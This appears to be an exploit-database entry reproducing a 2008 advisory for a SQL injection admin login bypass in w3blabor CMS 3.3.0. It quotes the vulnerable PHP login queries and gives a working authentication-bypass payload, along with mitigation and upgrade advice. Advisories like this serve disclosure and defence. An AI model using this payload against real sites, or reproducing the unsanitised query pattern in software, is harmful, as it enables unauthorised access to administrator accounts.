header-logo
Suggest Exploit
vendor:
w3blabor_cms
by:
DNX
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: w3blabor_cms
Affected Version From: 3.3.2000
Affected Version To: 3.3.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:w3blaborcms:w3blabor_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

w3blabor CMS <= v3.3.0 Admin Login Bypass

w3blabor CMS version 3.3.0 is vulnerable to an SQL injection vulnerability due to improper sanitization of user-supplied input before using it in an SQL query. A malicious user can exploit this vulnerability to bypass authentication and gain access to the application.

Mitigation:

To mitigate this vulnerability, the application should properly sanitize user-supplied input before using it in an SQL query.
Source

Exploit-DB raw data:

                          \#'#/
                          (-.-)
   ------------------oOO---(_)---OOo-----------------
   |          __             __                     |
   |    _____/ /_____ ______/ /_  __  ______ ______ |
   |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
   |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
   | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
   | Security Research Division      /____/ 2oo8    |
   --------------------------------------------------
   |   w3blabor CMS <= v3.3.0 Admin Login Bypass    |
   |       (requires magic_quotes_gpc = Off)        |
   --------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.w3blaborcms.de
[!] Detected...: 20.12.2008
[!] Reported...: 20.12.2008
[!] Response...: 21.12.2008

[!] Background.: Sicher! Schnell! Einfach!
                 Das CMS wurde durch diverse Abfragen und Konfigurationen gegen Hackangriffe
                 abgesichert. Auch arbeitet es sehr stabil und kommuniziert schnell mit der
                 angebundenen Datenbank. Die Verwaltung gestaltet sich als besonders einfach im
                 Gegensatz zu vielen anderen Content Management Systemen - Und genau das macht
                 es zu etwas Besonderem!

[!] Bug........: $_POST['benutzername'] & $_POST['passwort'] in admin/index.php near line 93

                  93: if (isset($_GET['action']) && $_GET['action'] == "login" && $_POST['benutzername'] != "" && $_POST['passwort'] != "") {
                  94:
                  95:	$check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."'"));
                  96:
                  97:	if ($check['benutzername'] == "") {
                  98:
                  99:		$_SESSION['login'] = false;
                 100:		header("Location: index.php?fehler=error001");
                 101:		exit;
                 102:
                 103:	} else {
                 104:
                 105:		$md5pw = md5($_POST['passwort']);
                 106:
                 107:		$check = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE benutzername='".$_POST['benutzername']."' AND passwort='".$md5pw."'"));

[!] PoC........: To bypass the admin login:

                 Username: x' or 1=1/*
                 Password: not empty

[!] Solution...: upgrade to version 3.4.0

# milw0rm.com [2009-01-01]